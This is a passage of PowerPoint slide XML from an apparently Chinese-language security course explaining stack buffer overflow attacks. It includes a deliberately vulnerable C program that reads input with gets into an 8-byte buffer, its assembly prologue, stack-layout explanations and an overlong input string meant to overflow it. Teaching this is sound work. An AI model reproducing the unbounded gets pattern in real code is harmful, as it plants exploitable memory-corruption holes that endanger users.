              <a:t>）漏洞被发现之前程序员一般不会意识到自己的程序存在漏洞，从而疏忽检测。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）恶意代码及其执行时间都很短，很难在执行过程中被发现。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）由于攻击者所发送的字符串与普通字符串一样，因此一般情况下防火墙不会阻拦，而攻击者通过执行恶意代码所获得的是本来不被允许或没有权限的操作，在防火墙看来也是合理合法的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）一个完整的恶意代码的执行并不一定会使系统报告错误，甚至可能不影响被攻击程序的运行。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）针对溢出漏洞的各种补丁程序也可能存在着溢出漏洞，使得针对这种漏洞的攻击防不胜防。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）攻击者可以借用木马植入的方法，故意在被攻击者的系统中留下存在漏洞的程序，或者利用病毒传播的方式来传播有漏洞的程序，从而实施攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="14847869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8.1.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4275248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、运行时的堆栈分配</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>堆栈溢出就是在不考虑堆栈中分配的局部数据块大小的情况下向该数据块写入了过多的数据，导致数据越界，结果覆盖了原来的堆栈数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有下面一段程序：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>（）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>char name[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>("please type your name:");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>gets(name);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>("hello, %s!", name);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="159301529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8.1.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4275248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>编译并且执行，当用户输入“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>ipxodi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>”时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>就会输出“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>Hello,ipxodi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>”。程序运行时，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>函数开始运行的时候，堆栈里面将被依次放入返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>（帧指针，指向当前活动记录的底部）。可以用“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> –S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>”来获得汇编语言输出，看到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>函数的开头部分对应如下语句：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>pushl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> $8,%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="128884717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8.1.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4275248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>首先程序把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>保存下来，然后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等于现在的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（栈指针，指向栈的栈顶，即下一个压入栈的活动记录的顶部），这样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就可以用来访问本函数的局部变量。之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>减</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，即堆栈向上增长</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个字节，用来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>存放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>name[]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。现在堆栈的布局如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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3073" name="Picture 1" descr="未命名-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381187" y="4226943"/>
            <a:ext cx="3429000" cy="1231900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4399472" y="5451894"/>
            <a:ext cx="3398807" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>堆栈布局</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="21029546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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8.2 0day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞应用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>软件安全性分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="48868547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8.1.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4275248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>完</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>gets(name)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，堆栈如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>最后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>返回，弹出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>里的地址，赋值给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>（寄存器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>存放当前指令的下一条指令的地址），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>继续执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>所指向的指令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" cap="none"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4369278" y="4997669"/>
            <a:ext cx="3398807" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>函数正常执行的堆栈布局</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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4097" name="Picture 1" descr="未命名-3"/>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149230" y="3482466"/>
            <a:ext cx="3429000" cy="12319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1984144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8.1.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>缓冲区溢出实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4275248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、堆栈溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>看起来一切顺利，但是我们再执行一次，输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>ipxodi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>AAAAAAAAAAAAAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
